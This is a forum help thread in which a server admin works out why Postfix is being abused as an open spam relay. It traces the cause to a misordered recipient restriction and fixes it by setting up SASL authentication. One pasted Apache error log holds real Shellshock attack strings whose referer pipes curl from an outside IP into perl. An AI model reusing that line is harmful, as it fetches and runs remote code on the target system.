[SOLVED] SMTP under attack. Help?

Help! (Home for newbies)
1

Hello,

Since shortly (3 days) I have been the target of a cracker. The attack uses up to now 3 known IP addresses:
iptables -I INPUT -s 108.178.61.228 -j DROP #spam
iptables -I INPUT -s 108.178.61.229 -j DROP #spam
iptables -I INPUT -s 198.143.132.2 -J DROP #spam
iptables -I INPUT -s 179.236.124.245 -J DROP #spam

The attacker sends e-mails from his server, uses my server as relay for my own domain and sends it out.
I do not understand how the attacker can send e-mails without having to login over SMTP.

An extract from the mail log:

Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD9BD58CB46F: from=<hbdbd5@MYDOMAIN.COM>, size=1220, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: 4B18E58DFCD4: removed
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: B733E58C411B: from=<yuehr@MYDOMAIN.COM>, size=1645, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BC3D858CEB1D: from=<ztjg1ilt@MYDOMAIN.COM>, size=1111, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/error[7917]: 3D29D58D0093: to=<aureliopereira22@hotmail.com>, relay=none, delay=181855, delays=181079/775/0/0.73, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7867]: 3A55158DC324: to=<luan.nextel@hotmail.com>, relay=none, delay=9889, delays=9113/775/0/0.93, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7369]: 36D2A58C839D: to=<eloina_f_silva@hotmail.com>, relay=none, delay=283587, delays=282811/774/0/1.5, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7360]: 3495958C8761: to=<mariasaraiva94@hotmail.com>, relay=none, delay=282674, delays=281898/775/0/0.55, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7392]: 3847E58D6CEB: to=<claysin_bts@hotmail.com>, relay=none, delay=106725, delays=105949/774/0/1.7, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7352]: 3C4DF59222C7: to=<marlon787@hotmail.com>, relay=none, delay=9625, delays=8849/775/0/1.1, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7868]: AACCA5940920: to=<elinewalc@hotmail.com>, relay=none, delay=777, delays=2.2/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7916]: C33515940921: to=<cris_sa@hotmail.com>, relay=none, delay=777, delays=2.4/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/smtp[7616]: 368C6590406B: to=<mrmarina@uol.com.br>, relay=mx.uol.com.br[200.147.36.15]:25, conn_use=4, delay=33035, delays=32132/902/0.25/0.65, dsn=4.7.1, status=deferred (host mx.uol.com.br[200.147.36.15] said: 450 4.7.1 <mrmarina@uol.com.br>: Recipient address rejected: MX-UOL-04 - Too many messages, try again later. (in reply to RCPT TO command))
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD30358CF5A5: from=<a7zbsltj@MYDOMAIN.COM>, size=1160, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BECAB5924EFE: from=<mxpny9yg@MYDOMAIN.COM>, size=1136, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/smtpd[7903]: warning: restriction `permit_mynetworks' after `permit' is ignored

My server is already being blocked by several blocklists.
I have made several changes to the settings and it seems that the attacker is unable to send e-mails now. But on the other hand, I am unable to send e-mail also.

My current biggest concern is:

  • what is impacted? Only postfix or might other systems be affected also?
  • how can the attacker send without username and password?
  • how can I counter this?
  • any passwords I should change?
  • Why can’t I send? The current logs are like this:

Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: disconnect from unknown[179.236.124.245] Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240] Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240] Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240] Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240] Oct 30 22:45:12 exalt2 postfix/smtpd[18981]: connect from MY.REVERSE.DOMAIN[my.home.ip] Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: warning: support for restriction "check_relay_domains" will be removed from Postfix; use "reject_unauth_destination" instead Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from MY.REVERSE.DOMAIN[my.home.ip]: 554 5.7.1 <XXXXXX@gmail.com>: Recipient address rejected: Relay access denied; from=<remi@MYDOMAIN.COM> to=<XXXXXX@gmail.com> proto=ESMTP helo=<[192.168.3.100]> Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: disconnect from MY.REVERSE.DOMAIN[my.home.ip]

Any help is greatly appreciated!

2

At the moment I am not receiving logs anymore of spam being sent. The only thing I still see is this:

Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: connect from unknown[179.236.124.245] Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: disconnect from unknown[179.236.124.245]

I still do not understand however what I did that makes them unable to send. “Cannot find your hostname” does that mean that any user on my server without a hostname would also be refused?
How likely is this?
How can I still improve security?

3

Is there a way I can easily activate the following option:

#relay_recipient_maps = hash:/etc/postfix/relay_recipients

If possible that Virtualmin would dynamically add new created mailboxes, that would be great …

----edit

I found that there is such a list: /etc/postfix/virtual
I will enable the following command in the /etc/postfix/main.cf:

relay_recipient_maps = hash:/etc/postfix/virtual
4

Howdy,

If you have any of those emails in your queue, you may want to review the email headers to get a better idea of what’s going on and how they’re getting in there.

It should not be possible to relay emails through your server, unless someone has guessed a password of one of your users.

Another option is that they could be accessing your server via a website containing a vulnerability of some sort.

What is the output of the command “postconf -n”? We can review that to see if there is anything unusual or insecure regarding your server’s Postfix installation (feel free to edit out your actual domain names).

-Eric

5

Hey Eric,

Thanks again for your reply.
Is it possible for an attacker to get the password due to the recent poodlebleed technique?
How can I verify with which account the attacker attempts to log in?
I emptied the whole queue, so there are no more malicious e-mails in there, but I see I am still getting plenty attempts, even though I blocked the IP’s in the iptables.

Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: connect from unknown[179.236.124.245] Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM> Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: disconnect from unknown[179.236.124.245]

In the secure log I see this a lot:

Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0) Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0) Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres
Could this be related?

In the apache logs I see no POSTS (is this logged by default?)
I only see failed attacks:

[code][Sun Oct 26 23:54:42 2014] [error] [client 95.183.244.244] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/xul, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] script not found or unable to stat: /var/www/cgi-bin/status, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 07:51:39 2014] [error] [client 216.24.87.106] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 17:55:39 2014] [error] [client 76.168.154.151] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 21:16:18 2014] [error] [client 211.24.26.250] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 22:47:17 2014] [error] [client 8.17.32.62] File does not exist: /var/www/html/recordings
[Tue Oct 28 02:43:12 2014] [error] [client 50.152.10.61] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-bin-sdb, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-mod, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
body.xml:1: parser error : Document labelled UTF-16 but has UTF-8 content

<?xml version="1.0" encoding="utf-16" standalone="yes"?> 
                                 ^


[Thu Oct 30 22:59:32 2014] [error] [client 125.64.35.67] File does not exist: /var/www/html/zc
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/riri
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/phpMyAdmin
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/pma
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/myadmin[/code] (isn’t there a possibility to create an automated blocklist in the iptables for IP’s that attempt to execute files in the /var/www/html dir?)

The output:

postconf -n alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases allow_percent_hack = no broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 disable_vrfy_command = yes home_mailbox = Maildir/ html_directory = no inet_interfaces = all inet_protocols = ipv4 mail_owner = postfix mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME mailbox_size_limit = 0 mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES relay_recipient_maps = hash:/etc/postfix/virtual sample_directory = /usr/share/doc/postfix-2.6.6/samples sender_bcc_maps = hash:/etc/postfix/bcc sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtpd_banner = smtp smtpd_helo_required = yes smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sender_restrictions = reject_unknown_client reject_invalid_hostname reject_unknown_sender_domain smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem smtpd_tls_key_file = /etc/postfix/postfix.key.pem smtpd_tls_mandatory_ciphers = high smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3 smtpd_tls_security_level = may unknown_local_recipient_reject_code = 550 virtual_alias_maps = hash:/etc/postfix/virtual

6

Hello Welschman, It is possible, but I doubt that. The mails are being sent from another server to my smtp server. The mails are not locally created. I am also running 2 file integrety checks, rkhunter, lmd and cfs. I had no messages. where as I used to get these kind of attacks, and they were spotted very rapidly…

7

It’s happening again :frowning:
These are the headers:

Mail headers View basic headers Received from TARWADAEX (mail.Sheffield.ae [91.73.219.154]) by MY.DOMAIN.COM (Postfix) with ESMTP id C167E58C06D8 for <joneslarry481@gmail.com>; Tue, 4 Nov 2014 18:23:03 +0100 (CET) MIME-Version 1.0 From admin@goodservers.com To joneslarry481@gmail.com Date 4 Nov 2014 21:34:04 +0400 Subject 144.76.127.234,mail,mail

The following showed in the logs:

Nov 4 19:58:03 exalt2 postfix/smtpd[15978]: connect from mail.tarwada.ae[91.73.219.154] Nov 4 19:58:03 exalt2 postfix/smtpd[15978]: warning: restriction `reject_unauth_destination' after `permit' is ignored Nov 4 19:58:04 exalt2 postfix/smtpd[15978]: 007D458C01BC: client=mail.tarwada.ae[91.73.219.154] Nov 4 19:58:05 exalt2 postfix/smtpd[15996]: connect from mail.Sheffield.ae[91.73.219.154] Nov 4 19:58:05 exalt2 postfix/smtpd[15996]: lost connection after CONNECT from mail.Sheffield.ae[91.73.219.154] Nov 4 19:58:05 exalt2 postfix/smtpd[15996]: disconnect from mail.Sheffield.ae[91.73.219.154] Nov 4 19:58:06 exalt2 postfix/smtpd[15996]: connect from mail.tarwada.ae[91.73.219.154] Nov 4 19:58:07 exalt2 postfix/smtpd[15996]: warning: restriction `reject_unauth_destination' after `permit' is ignored Nov 4 19:58:07 exalt2 postfix/smtpd[15996]: EAA2958C1317: client=mail.tarwada.ae[91.73.219.154] Nov 4 19:58:09 exalt2 postfix/cleanup[16005]: EAA2958C1317: message-id=<> Nov 4 19:58:09 exalt2 postfix/qmgr[31563]: EAA2958C1317: from=<admin@goodservers.com>, size=348, nrcpt=1 (queue active) Nov 4 19:58:11 exalt2 postfix/smtp[16008]: EAA2958C1317: host gmail-smtp-in.l.google.com[64.233.161.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX 15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. qi2si2225793lbb.47 - gsmtp (in reply to end of DATA command) Nov 4 19:58:13 exalt2 postfix/smtp[16008]: EAA2958C1317: to=<joneslarry481@gmail.com>, relay=alt1.gmail-smtp-in.l.google.com[64.233.168.27]:25, delay=5.3, delays=1.6/0.01/2.6/1, dsn=4.7.0, status=deferred (host alt1.gmail-smtp-in.l.google.com[64.233.168.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX 15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. pn6si1418211obb.17 - gsmtp (in reply to end of DATA command)) Nov 4 19:58:14 exalt2 postfix/cleanup[15995]: 007D458C01BC: message-id=<20141104225804.16907@localhost.localdomain> Nov 4 19:58:14 exalt2 postfix/qmgr[31563]: 007D458C01BC: from=<admin@goodservers.com>, size=406, nrcpt=1 (queue active) Nov 4 19:58:16 exalt2 postfix/smtp[16008]: 007D458C01BC: to=<joneslarry481@gmail.com>, relay=gmail-smtp-in.l.google.com[64.233.161.27]:25, delay=13, delays=11/0/0.17/2.1, dsn=2.0.0, status=sent (250 2.0.0 OK 1415127496 oi5si2023651lbb.135 - gsmtp) Nov 4 19:58:16 exalt2 postfix/qmgr[31563]: 007D458C01BC: removed Nov 4 19:58:56 exalt2 postfix/smtpd[15996]: disconnect from mail.tarwada.ae[91.73.219.154] Nov 4 19:58:56 exalt2 postfix/smtpd[15978]: disconnect from mail.tarwada.ae[91.73.219.154]

I really need to stop these attacks. Any help is very welcome!
How can they log in?
How can they even send? I set the “Map for allowed addresses for relaying” to hash:/etc/postfix/virtual. This way it should only allow to send mail from e-mail accounts which were created on the mail server…

8

according to the MX Toolbox my postfix ‘might’ be setup as an open relay.
How can I make it a closed relay?

9

I tried to add the following parameters to main.cf:
smtpd_sasl_security_options = noanonymous
smtpd_sasl_tls_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_sender_restrictions =permit_sasl_authenticated

However, Then I get the following error in the log:

Nov 4 20:45:42 exalt2 postfix/smtpd[21660]: warning: SASL: Connect to smtpd failed: No such file or directory Nov 4 20:45:42 exalt2 postfix/smtpd[21660]: fatal: no SASL authentication mechanisms Nov 4 20:45:43 exalt2 postfix/master[21629]: warning: process /usr/libexec/postfix/smtpd pid 21660 exit status 1 Nov 4 20:45:43 exalt2 postfix/master[21629]: warning: /usr/libexec/postfix/smtpd: bad command startup -- throttling

How should I interpret this? Is SASL not running or not configured? I am lost.

10

What you may want to try is go back to a basic/standard “smtpd_recipient_restrictions” line, and see if that resolves the issue. If so, then you can make some tweaks to it to harden it up a bit. But I’m wondering if your current smtpd_recipient_restrictions line is allowing relaying through your system.

My suggestion would be to replace you current line with this one, and then restart Postfix:

smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination

11

Hey Erik,

My restrictions is:
smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination permit_sasl_authenticated

I removed the “permit” but then I’m not allowed to send:

Nov  4 21:40:10 exalt2 postfix/smtpd[30289]: connect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]: 554 5.7.1 <destination@gmail.com>: Relay access denied; from=<origin@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: disconnect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]

I don’t see why the relay access has been denied though…

12

okay, I am a bit further now I think.
I removed the “permit” and I am still able to send from my webmail.
SMTP does not work yet though.
I noted there is no such file or directory: /var/spool/postfix/private/auth The lowest I could go was /var/spool/postfix/private/.
Could this be an indication to the problem?

13

Great, so it appears I got sals working with following :

[code]/etc/dovecot/conf.d/10-master.conf
for line

unix_listener private/auth
change it to

unix_listener /var/spool/postfix/private/auth
Restart dovecot and try again.[/code]

However, I am still having problems:
I can send from the webmail, but it refuses to send from smtp.
logs added:

##### via smtp:
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: connect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]: 554 5.7.1 <destination@gmail.com>: Recipient address rejected: Relay access denied; from=<username@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: disconnect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]

##### Via webmail:
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: connect from localhost[127.0.0.1]
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: 5188B58C069E: client=localhost[127.0.0.1], sasl_method=LOGIN, sasl_username=username.virtualServerAccountName
Nov  7 11:12:38 exalt2 postfix/cleanup[8585]: 5188B58C069E: message-id=<b55cf923eff6614e0e255a9897dbfd0a@MYDOMAIN.COM>
Nov  7 11:12:38 exalt2 postfix/qmgr[8222]: 5188B58C069E: from=<username@MYDOMAIN.COM>, size=1414, nrcpt=1 (queue active)
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: disconnect from localhost[127.0.0.1]
Nov  7 11:12:39 exalt2 postfix/smtp[8587]: 5188B58C069E: to=<destination@gmail.com>, relay=gmail-smtp-in.l.google.com[173.194.65.26]:25, delay=1, delays=0.2/0.01/0.18/0.61, dsn=2.0.0, status=sent (250 2.0.0 OK 1415355159 wo10si14454591wjc.32 - gsmtp)
Nov  7 11:12:39 exalt2 postfix/qmgr[8222]: 5188B58C069E: removed
14

Great. I found the problem.

Apparently it is an issue in which order you put the parameters for smtpd_recipient_restrictions and smtpd_sender_restrictions.
These are my current and work:

smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination

This is my postconf -n:

# postconf -n alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases allow_percent_hack = no broken_sasl_auth_clients = yes command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 disable_vrfy_command = yes home_mailbox = Maildir/ html_directory = no inet_interfaces = all inet_protocols = ipv4 mail_owner = postfix mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME mailbox_size_limit = 0 mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM newaliases_path = /usr/bin/newaliases.postfix queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES relay_recipient_maps = hash:/etc/postfix/virtual sample_directory = /usr/share/doc/postfix-2.6.6/samples sender_bcc_maps = hash:/etc/postfix/bcc sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtpd_banner = smtp smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_rbl_client zen.spamhaus.org reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_path = private/auth smtpd_sasl_type = dovecot smtpd_sender_restrictions = permit_mynetworks permit_sasl_authenticated reject_unknown_client, reject_invalid_hostname, reject_unknown_sender_domain, reject_unlisted_sender smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem smtpd_tls_key_file = /etc/postfix/postfix.key.pem smtpd_tls_mandatory_ciphers = high smtpd_tls_security_level = may unknown_local_recipient_reject_code = 550 virtual_alias_maps = hash:/etc/postfix/virtual

15

Probably been hacked and a file put on server, had a client recently with a footer.php file suddenly appear in a WP tinymce folder. Check the headers if a you can see where the generated mail is coming from.